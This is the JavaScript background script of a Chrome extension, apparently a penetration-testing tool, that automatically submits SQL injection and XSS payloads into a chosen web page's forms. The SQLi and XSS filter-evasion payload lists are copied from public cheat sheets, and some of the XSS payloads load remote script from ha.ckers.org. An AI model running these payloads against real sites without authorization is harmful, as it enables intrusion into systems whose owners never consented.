// Copyright 2013 Spotkick
// 
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// 
//   http://www.apache.org/licenses/LICENSE-2.0
// 
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

// Stack of inputs
inputStack = []
actionStack = []
attackCombos = []
successfulHacks = []

// Map of hacks issued to tabs
outstanding_hacks = {}

// From:
// http://ha.ckers.org/sqlinjection/
// XXX Should move this into a separate, loadable sqli.json file that gets loaded on startup in the extension
sqli_injections = [{"string":"1 OR 1=1","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1\' OR \'1\'=\'1","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1\'1","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1 EXEC XP_","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1 AND 1=1","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1\' AND 1=(SELECT COUNT(*) FROM tablenames); --","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1 AND USER_NAME() = \'dbo\'","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"\\\'; DESC users; --","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1\\\'1","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1\' AND non_existant_table = \'1","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"\' OR username IS NOT NULL OR username = \'","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) > 116","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\' --","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"1 UNI/**/ON SELECT ALL FROM WHERE","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"%31%27%20%4F%52%20%27%31%27%3D%27%31","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"&#x31;&#x27;&#x20;&#x4F;&#x52;&#x20;&#x27;&#x31;&#x27;&#x3D;&#x27;&#x31;","sig":"ha.ckers.org SQL Injection Cheet Sheet"},{"string":"&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49","sig":"ha.ckers.org SQL Injection Cheet Sheet"}];

// From:
// https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// XXX Should move this into a separate, loadable sqli.json file that gets loaded on startup in the extension
xss_injections = [{"string":"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>", "sig": "owasp.org"},
{"string":"'';!--\"<XSS>=&{()}", "sig": "owasp.org"},{"string":"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", "sig": "owasp.org"},
{"string":"<IMG SRC=\"javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<IMG SRC=javascript:alert('XSS')>", "sig": "owasp.org"},{"string":"<IMG SRC=JaVaScRiPt:alert('XSS')>", "sig": "owasp.org"},{"string":"<IMG SRC=javascript:alert(\"XSS\")>", "sig": "owasp.org"},{"string":"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", "sig": "owasp.org"},
{"string":"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "sig": "owasp.org"},{"string":"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "sig": "owasp.org"},{"string":"<IMG SRC=# onmouseover=\"alert('xxs')\">", "sig": "owasp.org"},{"string":"<IMG SRC= onmouseover=\"alert('xxs')\">", "sig": "owasp.org"},{"string":"<IMG onmouseover=\"alert('xxs')\">", "sig": "owasp.org"},{"string":"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "sig": "owasp.org"},{"string":"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>", "sig": "owasp.org"},
{"string":"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>", "sig": "owasp.org"},{"string":"<IMG SRC=\"jav	ascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<IMG SRC=java\0script:alert(\"XSS\")>", "sig": "owasp.org"},{"string":"<IMG SRC=\" &#14;  javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},{"string":"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>", "sig": "owasp.org"},
{"string":"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},{"string":"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", "sig": "owasp.org"},{"string":"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", "sig": "owasp.org"},{"string":"<SCRIPT SRC=//ha.ckers.org/.j>", "sig": "owasp.org"},{"string":"<IMG SRC=\"javascript:alert('XSS')\"", "sig": "owasp.org"},{"string":"<iframe src=http://ha.ckers.org/scriptlet.html <", "sig": "owasp.org"},{"string":"\";alert('XSS');//", "sig": "owasp.org"},{"string":"</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>", "sig": "owasp.org"},{"string":"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<BODY BACKGROUND=\"javascript:alert('XSS')\">", "sig": "owasp.org"},
{"string":"<IMG DYNSRC=\"javascript:alert('XSS')\">", "sig": "owasp.org"},{"string":"<IMG LOWSRC=\"javascript:alert('XSS')\">", "sig": "owasp.org"},{"string":"<BODY ONLOAD=alert('XSS')>", "sig": "owasp.org"},{"string":"<BGSOUND SRC=\"javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<BR SIZE=\"&{alert('XSS')}\">", "sig": "owasp.org"},{"string":"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "sig": "owasp.org"},{"string":"<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "sig": "owasp.org"},{"string":"<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>", "sig": "owasp.org"},{"string":"<XSS STYLE=\"xss:expression(alert('XSS'))\">", "sig": "owasp.org"},
{"string":"<XSS STYLE=\"behavior: url(xss.htc);\">", "sig": "owasp.org"},{"string":"¼script¾alert(¢XSS¢)¼/script¾", "sig": "owasp.org"},{"string":"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "sig": "owasp.org"},{"string":"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "sig": "owasp.org"},{"string":"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "sig": "owasp.org"},{"string":"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "sig": "owasp.org"},{"string":"<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "sig": "owasp.org"},
{"string":"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "sig": "owasp.org"},{"string":"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "sig": "owasp.org"},{"string":"<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">", "sig": "owasp.org"},{"string":"<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">", "sig": "owasp.org"},{"string":"<DIV STYLE=\"width: expression(alert('XSS'));\">", "sig": "owasp.org"},{"string":"<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->", "sig": "owasp.org"},{"string":"<BASE HREF=\"javascript:alert('XSS');//\">", "sig": "owasp.org"},
{"string":"<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "sig": "owasp.org"},{"string":"EMBED SRC=\"http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess=\"never\" and allownetworking=\"internal\" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "sig": "owasp.org"},{"string":"<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "sig": "owasp.org"},
{"string":"<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>", "sig": "owasp.org"},{"string":"<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(\"XSS\")</SCRIPT>\"></BODY></HTML>", "sig": "owasp.org"},{"string":"<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>", "sig": "owasp.org"},{"string":"<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", "sig": "owasp.org"},{"string":"", "sig": "owasp.org"},
{"string":"<? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>", "sig": "owasp.org"},{"string":"<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-", "sig": "owasp.org"},{"string":"<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},{"string":"<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},{"string":"<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},{"string":"<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},{"string":"<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},
{"string":"<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"},
{"string":"<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "sig": "owasp.org"}];

// chrome.tabs.executeScript(null, {code:"console.log(\" **** Overwrote alert ****\");window.alert = function() {patt = new RegExp('XSS', 'gi');for( i=0; i<arguments.length; i++){if ( patt.test( arguments[i] ) ){console.log('****  XSS  ****');msgFoundHack();}}return;};}"});
// chrome.tabs.executeScript(null, {code:"var s = document.createElement(\"script\"); (document.head||document.documentElement).appendChild(s);"});

function buildAttackCombos(actions, inputs)
{
	// Now build the injection list
	c = [];
	var injections;
	
	if ( localStorage["scan"] == "SQL" )
	{
		injections = sqli_injections;
	}else if ( localStorage["scan"] == "XSS" )
	{
		injections = xss_injections;
	}else
	{
		console.log( " [-] Unsupported scan type");
		return;
	}
	
	for(e=0; e<injections.length; e++)
	{
		for(a=0; a<actions.length; a++)
		{
			for(i=0; i<inputs.length; i++)
			{
				inputCombos = []

				for(j=0; j<inputs.length; j++)
				{
					var an_input = {};
					an_input.selector = inputs[j].outerHTML;

					if ( j == i )
					{
						// Inject this one - for testing
						an_input.val = injections[e].string;
					}else
					{
						an_input.val = smartfill( $(inputs[j]) );
//						an_input.val = 'testbed';
					}

					// console.log(" [*] Adding input combination:");
					// console.log( an_input );
					inputCombos.push(an_input);
				}

				var combo = {};
				combo.inputs = inputCombos;
				combo.action = actions[a].outerHTML;
				c.push(combo);
			}
		}
	}
	
	return c;
}

function resetState()
{
	console.log(" [*] Resetting state");
	inputStack = [];
	actionStack = [];
	attackCombos = [];	
}

function contextActionClicked(info, tab) {
  console.log("item " + info.menuItemId + " was clicked");
  console.log("info: " + JSON.stringify(info));
  console.log("tab: " + JSON.stringify(tab));

  fetchFormInputsFromTarget( tab.url, spotkickSettings.getAttackScope() );
}

function fetchFormInputsFromTarget(the_url, the_target_selector)
{
	console.log(' [*] Loading from inputs from target ' + the_target_selector);
	$.ajax({
		type: 'GET',
		url: the_url,
		async: false,
		success: function (response, textStatus, jqXHR){
			console.log( " [*] Generating parameter pairs:")
			resetState();
			
			var $form = $(the_target_selector, response).closest('form');
			inputs = $(':input', $form);
			
			console.log( inputs );
						
			for(i=0; i<inputs.length; i++)
			{
				// Things to click (need to add stuff that has a click event defined)
				// Don't return things that are submit buttons or hidden fields
				// http://www.w3.org/TR/html-markup/input.image.html
				if ( $(inputs[i]).prop("type") && ( $(inputs[i]).prop("type") == "submit" || $(inputs[i]).prop("type") == "image" || $(inputs[i]).prop("type") == "hidden" ) )
				{
					if ( $(inputs[i]).prop("type") == "image" )
					{
						actionStack.push( inputs[i] );						
					}
					continue;
				}
				// Things we can fiddle with
//				console.log( " [*] Pushing inputs onto stack: " + inputs[i] )
				inputStack.push( inputs[i] );
			}
			inputs = $form.find('textarea');
			for(i=0; i<inputs.length; i++)
			{
				// Things we can fiddle with
//				console.log( " [*] Pushing textareas onto stack: " + inputs[i] )
				inputStack.push( inputs[i] );
			}			
//			actions = $('[type="submit"]', $form);
			actions = $form.find('[type="submit"]');
			for(i=0; i<actions.length; i++)
			{
				// Things we can act with
//				console.log( " [*] Pushing actions onto stack: " + actions[i] )
				actionStack.push( actions[i] );
			}			
		}
	});	
	
	// Set the combos - how big might this get?
	attackCombos = buildAttackCombos(actionStack, inputStack);
	console.log( attackCombos );	
}

// Fetch the inputs in AJAX, then send off to our background page to load/prep
function fetchAllPageInputs(the_url)
{
	console.log(' [*] Loading page ' + the_url);
	$.ajax({
		type: 'GET',
		url: the_url,
		async: false,
		success: function (response, textStatus, jqXHR){
			console.log( " [*] Generating parameter pairs")
			resetState();
			inputs = $('input', response);
			for(i=0; i<inputs.length; i++)
			{
				// Things to click (need to add stuff that has a click event defined)
				if ( $(inputs[i]).prop("type") && ( $(inputs[i]).prop("type") == "submit" || $(inputs[i]).prop("type") == "hidden" ) )
				{
					continue;
				}
				// Things we can fiddle with
				console.log( " [*] Pushing inputs onto stack: " + inputs[i] )
				inputStack.push( inputs[i] );
			}
			inputs = $('textarea', response);
			for(i=0; i<inputs.length; i++)
			{
				// Things we can fiddle with
				console.log( " [*] Pushing textareas onto stack: " + inputs[i] )
				inputStack.push( inputs[i] );
			}			
			actions = $('[type="submit"]', response);
			for(i=0; i<actions.length; i++)
			{
				// Things we can act with
				console.log( " [*] Pushing actions onto stack: " + actions[i] )
				actionStack.push( actions[i] );
			}			
		}
	});	
	
	// Set the combos - how big might this get?
	attackCombos = buildAttackCombos(actionStack, inputStack);
	console.log( attackCombos );	
}

drawCPanel = function()
{
	chrome.tabs.insertCSS(null, {file:"cpanel.css"});
	chrome.tabs.insertCSS(null, {file:"css/bootstrap.css"});
	chrome.tabs.executeScript(null, {file:"jquery-1.8.2.min.js"}, function() {
		var imgURL = chrome.extension.getURL("img/jester.png");
		var status_msg = successfulHacks.length + " access points found";
	    chrome.tabs.executeScript(null, {code:"$('body').prepend('<div id=\"spotkickCpanel\" class=\"spotkickCpanel\"><h4>Spot Kick Me!</h4><img width=\"180\" src=\"" + imgURL + "\"><p id=\"skStatus\"></p><label class=\"radio inline\"><input type=\"radio\" id=\"SQL\" value=\"SQL\" name=\"scan\"> SQL</label><label class=\"radio inline\"><input type=\"radio\" id=\"XSS\" value=\"XSS\" name=\"scan\"> XSS</label><label class=\"radio inline\"><input type=\"radio\" id=\"NoSQL\" value=\"NoSQL\" name=\"scan\">NoSQL</label><div><a id=\"btnPlay\" class=\"btn btn-success\"><i class=\"icon-play\" ></i></a><a id=\"btnPause\" class=\"btn btn-info\"><i class=\"icon-pause\"></i></a><a id=\"btnStop\" class=\"btn btn-info\"><i class=\"icon-stop\" ></i></a></div></div>')"});
	    chrome.tabs.executeScript(null, {code:"$('#SQL').change( function() {msgSQL()} ); $('#NoSQL').change( function() {msgNoSQL()} ); $('#XSS').change( function() {msgXSS()} );"});
	    chrome.tabs.executeScript(null, {code:"$('#skStatus').append('" + status_msg + "')"});
	    chrome.tabs.executeScript(null, {code:"if ( $('div[name=\"SkXSS\"]').length > 0 ) { msgFoundHack(); $('div[name=\"SkXSS\"]').remove(); }"});
    });	
}

chrome.browserAction.onClicked.addListener( function(tab) {
	drawCPanel();
	localStorage["page_to_attack"] = tab.url;
	localStorage["attack_tab"] = tab.id;
	localStorage["state"] = "stop";
	localStorage["scan"] = "SQL";	
	outstanding_hacks = {};
	successfulHacks = [];		
//	fetchAllPageInputs(tab.url);
});

// Check the status of the result
chrome.webRequest.onCompleted.addListener(
	function(info) {

		return;
	},
	{
		urls: [],
		types: []
	},
	["responseHeaders"]
);

// hackFound = function ()
// {
// 	chrome.tabs.insertCSS(null, {file:"cpanel.css"});
// 	chrome.tabs.executeScript(null, {file:"jquery-1.8.2.min.js"}, function() {
// 		var imgURL = chrome.extension.getURL("img/jester.png");
// 	    chrome.tabs.executeScript(null, {code:"$('body').prepend('<div id=\"spotkickCpanel\" class=\"spotkickCpanel\"><h4>Spot Kick Me!</h4><img width=\"180\" src=\"" + imgURL + "\"><a class=\"btn btn-success\"><i class=\"icon-play\"></i></a><a class=\"btn btn-info\"><i class=\"icon-pause\"></i></a><a class=\"btn btn-info\"><i class=\"icon-stop\"></i></a></div>')"});
//     });	
// }

// Respond to job requests from tab clients
chrome.extension.onMessage.addListener(
	function(request, sender, sendResponse)
	{
		console.log( " [*] Request:");
		console.log( request );
		console.log( " [*] Sender:");
		console.log( sender );
		
		// Return if this isn't an attack tab
		if ( sender.tab.id != localStorage["attack_tab"] )
		{
			sendResponse( {
				ignore: true,
				taburl: sender.tab.url
			} );				
			return;				
		}

		if ( request.type == "element_clicked" )
		{
			console.log( " [*] Element clicked! => ");
			console.log( request.data );
			
			// Set our scope preference
			spotkickSettings.setAttackScope( request.data );
			
			// Update the menu
			chrome.contextMenus.removeAll( function()
			{
				for (var i = 0; i < contexts.length; i++) {
					var context = contexts[i];
					var title = "Attack form containing: " + request.data;
					var id = chrome.contextMenus.create({"title": title, "contexts":[context],
					"onclick": contextActionClicked});
					console.log(" [*] Created context menu entry with id " + id);
				}
			});

			sendResponse( {
				ignore: true,
				taburl: sender.tab.url
			} );
			
			return;
		}
		
		// Draw the panel
		drawCPanel(); 
		
		if ( request.type == "check_ignore" )
		{
			// Check is run before clicking and after filling in values
			if ( localStorage["state"] == "stop" || localStorage["state"] == "pause" )
			{
				sendResponse( {
					ignore: true
				} );
			}else
			{
				sendResponse( {
					ignore: false,
					selector: request.data
				} );				
			}				
			return;										
		}
		
		if ( request.type !== "set_scan" && request.type !== "set_state" && ( localStorage["state"] == "stop" || localStorage["state"] == "pause" ) )
		{
			sendResponse( {
				ignore: true,
				taburl: sender.tab.url
			} );				
			return;							
		}	
		
		if ( request.type == "hack_found")
		{
			successfulHacks.push( [ request.data, outstanding_hacks[sender.tab.id] ] );
			sendResponse( {
				taburl: sender.tab.url
			} );				
			return;							
		}else if ( request.type == "set_scan")
		{
			console.log( " [*] Setting scan type to " + request.data);
			localStorage["scan"] = request.data;
//			fetchAllPageInputs(sender.tab.url);		
		}else if ( request.type == "set_state" && request.data !== "play")
		{
			if ( request.data == "pause" )
			{
				localStorage["state"] = "pause";			
				console.log( " [*] Pausing");						
				chrome.tabs.executeScript(null, {file:"jquery-1.8.2.min.js"}, function() {
				    chrome.tabs.executeScript(null, {code:"$('#btnPause').addClass('disabled'); $('#btnPlay').removeClass('disabled'); $('#btnStop').removeClass('disabled');"});
			    });						
			}else if ( request.data == "stop" )
			{
				localStorage["state"] = "stop";	
				localStorage["scan"] = "SQL";				
				console.log( " [*] Stopping");						
				chrome.tabs.executeScript(null, {file:"jquery-1.8.2.min.js"}, function() {
				    chrome.tabs.executeScript(null, {code:"$('#btnStop').addClass('disabled'); $('#btnPause').removeClass('disabled'); $('#btnPlay').removeClass('disabled');"});
			    });						
				resetState();		
			}
		}else if ( request.type == "get_job" || ( request.type == "set_state" && request.data == "play" ) )
		{			
			//document.location.href
			if ( request.type == "get_job" && sender.tab.url.toLowerCase() !== request.data.toLowerCase() )
			{
				console.log( " [*] Ignoring.  Not for the main frame.");			
				sendResponse( {
					ignore: true,
					taburl: sender.tab.url
				} );				
				return;
			}

			// Redirect if this is an attack tab and we're not on the attack page		
			if ( sender.tab.url !== localStorage["page_to_attack"] )
			{
				sendResponse( {
					parms: "",
					redirect: localStorage["page_to_attack"],
					taburl: sender.tab.url
				} );				
				return;
			}
			
			if ( request.data == "play" )
			{
				localStorage["state"] = "play";	
				console.log( " [*] Playing");
				chrome.tabs.executeScript(null, {file:"jquery-1.8.2.min.js"}, function() {
				    chrome.tabs.executeScript(null, {code:"$('#btnPlay').addClass('disabled'); $('#btnPause').removeClass('disabled'); $('#btnStop').removeClass('disabled');"});
			    });
			}
						
			// Pull a set of parameters off the stack
			console.log( " [*] " + attackCombos.length + " attackCombos remaining: " );
//			console.log( attackCombos );
			the_attack = attackCombos.pop();
			
			// Register this issued attack
			outstanding_hacks[sender.tab.id] = the_attack;
			
			// if ( typeof elt == "undefined" )
			// {
			// 	the_html = "";
			// }else
			// {
			// 	the_html = elt.outerHTML;
			// }		
			// console.log( " [*] Returning element: " + elt );
			
			sendResponse( {
				attack: the_attack,
				taburl: sender.tab.url
			} );
		}
	}
);
